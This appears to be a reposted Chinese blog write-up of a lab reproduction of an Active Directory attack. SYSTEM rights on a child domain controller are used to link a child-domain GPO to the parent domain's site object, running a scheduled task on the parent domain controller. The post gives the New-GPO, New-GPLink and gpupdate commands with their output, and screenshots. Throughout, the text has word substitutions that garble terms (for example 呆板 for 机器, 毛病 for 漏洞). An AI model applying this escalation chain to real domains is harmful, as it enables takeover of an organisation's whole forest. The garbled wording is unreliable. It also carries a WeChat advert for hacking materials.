利用子域的System权限通往父域

前言

近来翻阅笔记发现一篇文章提到通过子域的System权限可以突破获取到父域权限，本文将对此技术举行实验复现研究。
利用分析

环境信息：

1. 子域：187、sub.cs.org
2. 父域：197、cs.org

复制代码

首先通过在子域的域控呆板上打开mmc.exe->连接ADSI->设置来查看子域的设置命名上下文：

[img=720,391.94805194805195]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640869.jpg[/img]

[img=720,536.504854368932]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640871.jpg[/img]

从设置中可以看到设置命名上下文的域名现实上是父域cs.org，因此判断子域中看到的信息可能是父域的副本：

[img=720,325.24590163934425]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640872.jpg[/img]

继续查看设置对象的安全形貌符中的ACL，发现子域没有权限去变动：

[img=720,547.4380165289256]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640873.jpg[/img]

但是可以看到除了域用户、域管用户以外，还有一个特权ACL条目叫SYSTEM，该条目拥有完全控制权限：

[img=720,449.06444906444904]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640874.jpg[/img]

SYSTEM属于一个特别用户，不属于域内用户，因此理论上只要能做到是SYSTEM权限就能控制对象条目而不消关注是不是域内管理员。因此实验使用SYSTEM权限继续打开设置命名上下文：

[img=720,258.3206106870229]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640875.jpg[/img]

可以看到当子域拥有了SYSTEM权限后就可以修改来自父域副本的设置对象：

[img=720,476.7378640776699]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640876.jpg[/img]

【----资助网安学习，以下所有学习资料免费领！加vx：dctintin，备注 “博客园” 获取！】
　① 网安学习发展路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC毛病分析陈诉
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂口试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
利用方式

既然可以控制父域的设置命名上下文，那如何利用呢？网上提到有几种方式，一种是通过GPO、还有的是提到给父域添加一个本身可控的证书模板(ESC1)，这里以GPO组策略为例。先在子域域控上创建一个GPO:

1. New-GPO jumbo_gpo_test

复制代码

[img=720,310.2439024390244]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640877.jpg[/img]

[img=720,463.96856581532415]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640878.jpg[/img]

设置计划使命:

[img=720,455.13307984790873]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640880.jpg[/img]

通过SYSTEM权限把子域的GPO link到父域：

1. PS C:\Windows\system32> Get-ADDomainController -Server cs.org | select HostNane, ServerObjectDN
2. ​
3. HostNane ServerObjectDN
4. -------- --------------
5. {}       CN=10_4_45_197,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cs,DC=org

复制代码

1. PS C:\Windows\system32> New-GPLink -Name "jumbo_gpo_test" -Target "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cs,DC=org" -Server sub.cs.org
2. ​
3. ​
4. GpoId       : 76606696-cd03-4349-b0f2-0a45bdf305d4
5. DisplayName : jumbo_gpo_test
6. Enabled     : True
7. Enforced    : False
8. Target      : CN=Default-First-Site-Name,cn=Sites,CN=Configuration,DC=cs,DC=org
9. Order       : 1

复制代码

[img=720,276.1128526645768]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640881.jpg[/img]

父域刷新组策略可以看到子域链接过来的GPO：

[img=720,398.5940246045694]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640882.jpg[/img]

父域更新组策略成功执行计划使命notepad.exe：

1. gpupdate /force

复制代码

[img=720,488.64864864864865]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640883.jpg[/img]

刷新组策略后通过gpresult /r命名也可以看到添加的GPO：

[img=720,303.0060120240481]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202408231640884.jpg[/img]

总结

本文先容了除SidHistory以外还可以通过子域的System权限举行突破到父域的攻击手法。
更多网安技能的在线实操练习，请点击这里>>
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。